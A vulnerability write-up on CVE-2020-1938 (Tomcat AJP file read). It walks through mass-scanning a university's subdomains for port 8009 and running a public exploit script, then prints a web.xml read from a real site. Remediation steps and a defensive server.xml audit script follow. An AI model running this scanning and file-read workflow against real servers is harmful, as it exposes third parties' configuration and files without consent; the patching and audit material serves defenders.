Reproduction test of CVE-2020-1938: reading files, directory listings and other information


1. Vulnerability Overview

On 20 February, the China National Vulnerability Database (CNVD) published an Apache Tomcat file inclusion vulnerability (CNVD-2020-10487 / CVE-2020-1938). The vulnerability stems from a flaw in Tomcat's AJP protocol: by constructing specific request attributes, an attacker can read arbitrary files under the server's webapp directory. If the target server also exposes a file-upload function, the attacker can go further and achieve remote code execution. The exploitation technique is that of a file inclusion vulnerability. The vendor has already released new versions that fix the issue.

2. Affected Scope

Affected versions

  • Apache Tomcat 6
  • Apache Tomcat 7 < 7.0.100
  • Apache Tomcat 8 < 8.5.51
  • Apache Tomcat 9 < 9.0.31

Unaffected versions

  • Apache Tomcat = 7.0.100
  • Apache Tomcat = 8.5.51
  • Apache Tomcat = 9.0.31

3. Vulnerability Reproduction Test

Because the impact of this vulnerability is so broad, it has been submitted like crazy on all the major SRC (security response centre) platforms over the past few days, especially the education SRC, to the point where they have stopped awarding rank for it. Unfortunately I reacted too slowly and missed out; most of what I submitted was marked as a duplicate, which is discouraging, but I spent a whole day on it, so I might as well write down the detection and exploitation process so the day is not wasted. This vulnerability can also be submitted to other SRC platforms, because the affected range is so large. Basically, any site running one of the Apache Tomcat versions above with the Tomcat AJP protocol enabled on port 8009 will be hit.

Taking a website of Shenyang University of Technology as the example (I cannot disclose the specific domain; I am a bit of a coward).

First, an introduction to the script tool used:

https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner

Download and unzip it.

Runtime environment: Python 2

Using the education SRC template I submitted today as the example:

1. First find a school that has not been submitted against in the last two days; that gives better odds... yes, I am shamelessly scraping leftover points...
2. Then find its main site, run subdomain enumeration, pick out the sub-sites running Apache middleware, and copy those domains into ip.txt (domain only; do not add the protocol, www or http/s).
3. Use the threading-find-port-8009.py script to verify whether the sites in ip.txt have port 8009 open; the domains with port 8009 open are filtered into 8009.txt. Command: python threading-find-port-8009.py

4. Then use the threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py script to verify whether the vulnerability is present, saving the confirmed domains to vul.txt; everything in that file is a vulnerable site. Command: python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

5. Exploit the vulnerability: use the CNVD-2020-10487-Tomcat-Ajp-lfi.py script to read sensitive file contents. Command: python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

The following part of a sensitive XML file (the application's web.xml) was obtained:

<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_ID" version="2.4"
xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<display-name>WKXT Application</display-name>
<!-- start proxool connection pool -->

<servlet>
    <display-name>proxool</display-name>
    <servlet-name>ServletConfigurator</servlet-name>
    <servlet-class>
        org.logicalcobwebs.proxool.configuration.ServletConfigurator</servlet-class>
    <init-param>
        <param-name>xmlFile</param-name>
        <param-value>WEB-INF/proxool.xml</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
<servlet>
    <servlet-name>wkxtAdmin</servlet-name>
    <servlet-class>org.logicalcobwebs.proxool.admin.servlet.AdminServlet</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>wkxtAdmin</servlet-name>
    <url-pattern>/wkxtAdmin</url-pattern>
</servlet-mapping>

<security-constraint>
<web-resource-collection>
<web-resource-name>proxool</web-resource-name>
<url-pattern>/wkxtAdmin</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>manager</role-name>
</auth-constraint>
</security-constraint>
<login-config>
<auth-method>BASIC</auth-method>
<realm-name>proxool manager Application</realm-name>
</login-config>
<security-role>
<description>The role that is required to log in to the Manager Application</description>
<role-name>manager</role-name>
</security-role>

<!-- end proxool connection pool -->


<context-param>
    <param-name>contextConfigLocation</param-name>
    <param-value>/WEB-INF/applicationContext.xml</param-value>
</context-param>

<!-- Spring startup configuration; 1 means start automatically -->
<servlet>
    <servlet-name>context</servlet-name>
    <servlet-class>org.springframework.web.context.ContextLoaderServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
</servlet>
<filter>
    <filter-name>ValidateScriptFilter</filter-name>
    <filter-class>com.lyt.util.filter.ValidateScriptFilter</filter-class>
</filter>

<filter>
    <filter-name>CharacterEncodingFilter</filter-name>
    <filter-class>com.lyt.util.web.CharacterEncodingFilter</filter-class>
    <init-param>
        <param-name>encoding</param-name>
        <param-value>UTF-8</param-value>
    </init-param>
</filter>

<filter>
    <description>解決SQL注入問   XSS(跨站腳本弱點) CSRF(跨站請求偽造)</description>
    <display-name>XssFilter</display-name>
    <filter-name>XssFilter</filter-name>
    <filter-class>com.magtech.filter.XssFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>CharacterEncodingFilter</filter-name>
    <url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
    <filter-name>XssFilter</filter-name>
    <url-pattern>/CN/*</url-pattern>
</filter-mapping>
<filter-mapping>
    <filter-name>XssFilter</filter-name>
    <url-pattern>/EN/*</url-pattern>
</filter-mapping>

<!--
<filter-mapping>
<filter-name>ValidateScriptFilter</filter-name>
<url-pattern>/</url-pattern>
</filter-mapping>
-->
<filter>
<filter-name>UrlRewriteFilter</filter-name>
<filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>UrlRewriteFilter</filter-name>
<url-pattern>/</url-pattern>
</filter-mapping>

<servlet>
    <servlet-name>action</servlet-name>
    <servlet-class>org.apache.struts.action.ActionServlet</servlet-class>

    <init-param>
        <param-name>config/pay</param-name>
        <param-value>/WEB-INF/struts-common.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config</param-name>
        <param-value>/WEB-INF/struts-config.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage</param-name>
        <param-value>/WEB-INF/struts-manage.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/volumn</param-name>
        <param-value>/WEB-INF/struts-volumn-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/article</param-name>
        <param-value>/WEB-INF/struts-article-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/article</param-name>
        <param-value>/WEB-INF/struts-article-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/article</param-name>
        <param-value>/WEB-INF/struts-article-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/emag</param-name>
        <param-value>/WEB-INF/struts-emag-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/emag</param-name>
        <param-value>/WEB-INF/struts-emag-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/emag</param-name>
        <param-value>/WEB-INF/struts-emag-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/attach</param-name>
        <param-value>/WEB-INF/struts-attach.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/subject</param-name>
        <param-value>/WEB-INF/struts-subject.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/domain</param-name>
        <param-value>/WEB-INF/struts-domain.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/field</param-name>
        <param-value>/WEB-INF/struts-field.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/channel</param-name>
        <param-value>/WEB-INF/struts-channel.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/finance</param-name>
        <param-value>/WEB-INF/struts-finance-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/finance</param-name>
        <param-value>/WEB-INF/struts-finance-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/finance</param-name>
        <param-value>/WEB-INF/struts-finance-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/money</param-name>
        <param-value>/WEB-INF/struts-money-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/pay</param-name>
        <param-value>/WEB-INF/struts-money.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/user</param-name>
        <param-value>/WEB-INF/struts-user-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/user</param-name>
        <param-value>/WEB-INF/struts-user-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/user</param-name>
        <param-value>/WEB-INF/struts-user-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/author</param-name>
        <param-value>/WEB-INF/struts-author-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/keyword</param-name>
        <param-value>/WEB-INF/struts-keyword-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/journal</param-name>
        <param-value>/WEB-INF/struts-journal.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/column</param-name>
        <param-value>/WEB-INF/struts-column-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/item</param-name>
        <param-value>/WEB-INF/struts-item-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/item</param-name>
        <param-value>/WEB-INF/struts-item-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/item</param-name>
        <param-value>/WEB-INF/struts-item-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/rss</param-name>
        <param-value>/WEB-INF/struts-rss-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/rss</param-name>
        <param-value>/WEB-INF/struts-rss-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/rss</param-name>
        <param-value>/WEB-INF/struts-rss-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/feedback</param-name>
        <param-value>/WEB-INF/struts-feedback-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/feedback</param-name>
        <param-value>/WEB-INF/struts-feedback-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/feedback</param-name>
        <param-value>/WEB-INF/struts-feedback-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/CN/order</param-name>
        <param-value>/WEB-INF/struts-order-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/order</param-name>
        <param-value>/WEB-INF/struts-order-en.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/manage/order</param-name>
        <param-value>/WEB-INF/struts-order-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/alert</param-name>
        <param-value>/WEB-INF/struts-alert-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/browse</param-name>
        <param-value>/WEB-INF/struts-browse.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/download</param-name>
        <param-value>/WEB-INF/struts-download.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/alertorder</param-name>
        <param-value>/WEB-INF/struts-alertorder-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/CN/alert</param-name>
        <param-value>/WEB-INF/struts-alert-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/alert</param-name>
        <param-value>/WEB-INF/struts-alert-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/ipaddr</param-name>
        <param-value>/WEB-INF/struts-ipaddr-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/CN/comment</param-name>
        <param-value>/WEB-INF/struts-comment-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/comment</param-name>
        <param-value>/WEB-INF/struts-comment-en.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/manage/comment</param-name>
        <param-value>/WEB-INF/struts-comment-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/template</param-name>
        <param-value>/WEB-INF/struts-template.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/click</param-name>
        <param-value>/WEB-INF/struts-click.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/news</param-name>
        <param-value>/WEB-INF/struts-news-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/news</param-name>
        <param-value>/WEB-INF/struts-news-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/news</param-name>
        <param-value>/WEB-INF/struts-news-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/folder</param-name>
        <param-value>/WEB-INF/struts-folder-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/model</param-name>
        <param-value>/WEB-INF/struts-model-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/down</param-name>
        <param-value>/WEB-INF/struts-down-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/mail</param-name>
        <param-value>/WEB-INF/struts-mail-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/adv</param-name>
        <param-value>/WEB-INF/struts-adv-ht.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/location</param-name>
        <param-value>/WEB-INF/struts-location-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/location</param-name>
        <param-value>/WEB-INF/struts-location-cn.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/EN/location</param-name>
        <param-value>/WEB-INF/struts-location-en.xml</param-value>
    </init-param>

    <init-param>
        <param-name>config/manage/type</param-name>
        <param-value>/WEB-INF/struts-type.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/manage/provider</param-name>
        <param-value>/WEB-INF/struts-provider-ht.xml</param-value>
    </init-param>
    <init-param>
        <param-name>config/CN/provider</param-name>
        <param-value>/WEB-INF/struts-provider-cn.xml</param-value>
    </init-param>

4. Remediation Recommendations
1. If the Tomcat AJP protocol is not in use:
If you are not using the Tomcat AJP protocol, upgrade Tomcat directly to 9.0.31, 8.5.51 or 7.0.100 to fix the vulnerability.
If you cannot update immediately, or are running an older version, disable the AJP Connector outright or change its listen address so that it only listens on localhost.
Steps:
(1) Edit <CATALINA_BASE>/conf/server.xml and find the following line (<CATALINA_BASE> is Tomcat's working directory):
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
(2) Comment the line out (or delete it):
<!--<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />-->
(3) Save the file and restart Tomcat for the change to take effect.
2. If the Tomcat AJP protocol is in use:
Upgrade Tomcat immediately to 9.0.31, 8.5.51 or 7.0.100 and, at the same time, configure a secret on the AJP Connector so that AJP connections are authenticated. For example (YOUR_TOMCAT_AJP_SECRET must be replaced with a strong value that cannot be easily guessed):
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET" />
If you cannot update immediately, or are running an older version, configure requiredSecret on the AJP Connector to set the AJP authentication credential. For example (again, YOUR_TOMCAT_AJP_SECRET must be replaced with a strong value that cannot be easily guessed):
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" address="YOUR_TOMCAT_IP_ADDRESS" requiredSecret="YOUR_TOMCAT_AJP_SECRET" />
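The affected-version list in section 2 and the AJP Connector settings above can be turned into a configuration audit that a server owner runs against their own server.xml. The following Python 3 script is an added example written for this page; it is not code from the original post or from the scanner repository linked above. The server.xml fragments in it are constructed, and the rule that a Connector with no address attribute is treated as listening on all interfaces is this example's conservative assumption. It also flags a secret that was copied verbatim from the advisory's placeholder, since that is an easy mistake when pasting the recommended line.

```python
"""Defender-side audit for CVE-2020-1938 (Ghostcat).

Two checks: (1) does a Tomcat version fall in the advisory's affected range,
(2) does a server.xml define an AJP Connector that is reachable over the
network without authentication. Added example for this page, not the
original post's code.
"""
import re
import xml.etree.ElementTree as ET

# First fixed release per major line, from the advisory's "unaffected versions".
FIXED_RELEASES = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}

# Listen addresses that keep the AJP port off the network.
LOOPBACK_ADDRESSES = {"127.0.0.1", "localhost", "::1", "0:0:0:0:0:0:0:1"}

# Placeholder from the advisory's example line; must never ship as-is.
ADVISORY_PLACEHOLDER = "YOUR_TOMCAT_AJP_SECRET"


def parse_version(version):
    """'9.0.30' -> (9, 0, 30); any trailing qualifier is ignored."""
    match = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not match:
        raise ValueError("unrecognised Tomcat version: %r" % version)
    return tuple(int(part) for part in match.groups())


def is_affected_version(version):
    """True when the version is inside the advisory's affected range."""
    parsed = parse_version(version)
    major = parsed[0]
    if major == 6:
        return True  # Tomcat 6 is end-of-life; every release is listed as affected
    fixed = FIXED_RELEASES.get(major)
    if fixed is None:
        return False  # major lines the advisory does not list
    return parsed < fixed


def audit_ajp_connectors(server_xml):
    """Return one finding dict per AJP Connector found in server.xml.

    A commented-out Connector never reaches the parser, so a server.xml with
    the AJP line commented out yields an empty list (AJP disabled).
    Assumption: a Connector without an address attribute is treated as
    listening on all interfaces.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for connector in root.iter("Connector"):
        protocol = connector.get("protocol", "HTTP/1.1")
        # Matches "AJP/1.3" and explicit classes like org.apache.coyote.ajp.AjpNioProtocol.
        if "ajp" not in protocol.lower():
            continue
        address = connector.get("address")
        secret = connector.get("secret") or connector.get("requiredSecret")
        placeholder_secret = secret == ADVISORY_PLACEHOLDER
        bound_to_loopback = address in LOOPBACK_ADDRESSES
        authenticated = bool(secret) and not placeholder_secret
        findings.append({
            "port": connector.get("port"),
            "address": address,
            "bound_to_loopback": bound_to_loopback,
            "authenticated": authenticated,
            "placeholder_secret": placeholder_secret,
            # Reachable from the network and accepting unauthenticated AJP requests.
            "exposed": not bound_to_loopback and not authenticated,
        })
    return findings


# Constructed server.xml fragments containing only the elements the audit reads.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

DISABLED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <!--<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />-->
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
               address="127.0.0.1" secret="example-only-change-me" />
  </Service>
</Server>"""

if __name__ == "__main__":
    for label, version in (("old 9.x", "9.0.30"), ("fixed 9.x", "9.0.31")):
        print(label, version, "affected" if is_affected_version(version) else "not affected")
    for label, doc in (("weak", WEAK_SERVER_XML), ("disabled", DISABLED_SERVER_XML),
                       ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(doc) or "no AJP Connector defined")
```

Run it against a copy of the real <CATALINA_BASE>/conf/server.xml by passing the file contents to audit_ajp_connectors; any finding with "exposed" set is the condition the advisory describes, and "placeholder_secret" catches the case where the example line was pasted without replacing the secret.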